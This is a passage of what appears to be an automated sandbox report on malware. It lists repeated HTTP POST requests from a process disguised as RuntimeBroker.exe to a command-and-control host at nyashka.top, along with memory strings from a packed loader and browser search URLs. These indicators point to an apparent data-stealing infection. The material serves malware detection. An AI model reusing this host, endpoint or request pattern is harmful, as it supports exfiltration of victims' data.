                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 1872Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 1872Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 1852Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 1872Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                                    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: global trafficDNS traffic detected: DNS query: 373292cm.nyashka.top
                                    Source: unknownHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: RuntimeBroker.exe, 00000011.00000002.3435800974.00000000039DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://373292cm.nyP
                                    Source: RuntimeBroker.exe, 00000011.00000002.3435800974.00000000039DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://373292cm.nyPR
                                    Source: RuntimeBroker.exe, 00000011.00000002.3435800974.0000000003970000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3435800974.00000000039DB000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3435800974.00000000037B4000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3435800974.00000000039DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://373292cm.nyashka.top
                                    Source: RuntimeBroker.exe, 00000011.00000002.3435800974.00000000037B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://373292cm.nyashka.top/
                                    Source: RuntimeBroker.exe, 00000011.00000002.3435800974.0000000003CBC000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3435800974.00000000038B3000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3435800974.0000000003970000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3435800974.00000000037B4000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3435800974.00000000039DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary.php
                                    Source: chainPorthostCommon.exe, 00000005.00000002.2352626856.000000000319A000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3435800974.00000000037B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                    Source: loader.exe, 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmp, loader.exe, 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.enigmaprotector.com/
                                    Source: loader.exe, 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.enigmaprotector.com/openU
                                    Source: RuntimeBroker.exe, 00000011.00000002.3463672667.00000000149BB000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013648000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.00000000145EB000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013B63000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014183000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013939000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013ACB000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014922000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.000000001473A000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014552000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013E4B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014B0A000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014BA3000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.000000001421B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.00000000147D3000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013DB3000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.000000001436B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014033000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013F9B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014403000.00000004.00000800.00020000.00000000.sdmp, ILsVoJuzGv.17.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                                    Source: RuntimeBroker.exe, 00000011.00000002.3463672667.00000000149BB000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013648000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.00000000145EB000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013B63000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014183000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013939000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013ACB000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014922000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.000000001473A000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014552000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013E4B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014B0A000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014BA3000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.000000001421B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.00000000147D3000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013DB3000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.000000001436B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014033000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013F9B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014403000.00000004.00000800.00020000.00000000.sdmp, ILsVoJuzGv.17.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                                    Source: RuntimeBroker.exe, 00000011.00000002.3463672667.00000000149BB000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013648000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.00000000145EB000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013B63000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014183000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013939000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013ACB000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014922000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.000000001473A000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014552000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013E4B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014B0A000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014BA3000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.000000001421B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.00000000147D3000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013DB3000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.000000001436B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014033000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013F9B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014403000.00000004.00000800.00020000.00000000.sdmp, ILsVoJuzGv.17.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                                    Source: RuntimeBroker.exe, 00000011.00000002.3463672667.00000000149BB000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013648000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.00000000145EB000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013B63000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014183000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013939000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013ACB000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014922000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.000000001473A000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014552000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013E4B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014B0A000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014BA3000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.000000001421B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.00000000147D3000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013DB3000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.000000001436B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014033000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013F9B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014403000.00000004.00000800.00020000.00000000.sdmp, ILsVoJuzGv.17.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                                    Source: RuntimeBroker.exe, 00000011.00000002.3463672667.00000000149BB000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013648000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.00000000145EB000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013B63000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014183000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013939000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013ACB000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014922000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.000000001473A000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014552000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013E4B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014B0A000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014BA3000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.000000001421B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.00000000147D3000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013DB3000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.000000001436B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014033000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013F9B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014403000.00000004.00000800.00020000.00000000.sdmp, ILsVoJuzGv.17.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                                    Source: RuntimeBroker.exe, 00000011.00000002.3463672667.00000000149BB000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013648000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.00000000145EB000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013B63000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014183000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013939000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013ACB000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014922000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.000000001473A000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014552000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013E4B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014B0A000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014BA3000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.000000001421B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.00000000147D3000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013DB3000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.000000001436B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014033000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013F9B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014403000.00000004.00000800.00020000.00000000.sdmp, ILsVoJuzGv.17.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                                    Source: RuntimeBroker.exe, 00000011.00000002.3463672667.00000000149BB000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013648000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.00000000145EB000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013B63000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014183000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013939000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013ACB000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014922000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.000000001473A000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014552000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013E4B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014B0A000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014BA3000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.000000001421B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.00000000147D3000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013DB3000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.000000001436B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014033000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013F9B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014403000.00000004.00000800.00020000.00000000.sdmp, ILsVoJuzGv.17.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                                    Source: RuntimeBroker.exe, 00000011.00000002.3463672667.00000000149BB000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013648000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.00000000145EB000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013B63000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014183000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013939000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013ACB000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014922000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.000000001473A000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014552000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013E4B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014B0A000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014BA3000.00000004.00000800.00020000.00000000.sdmp, 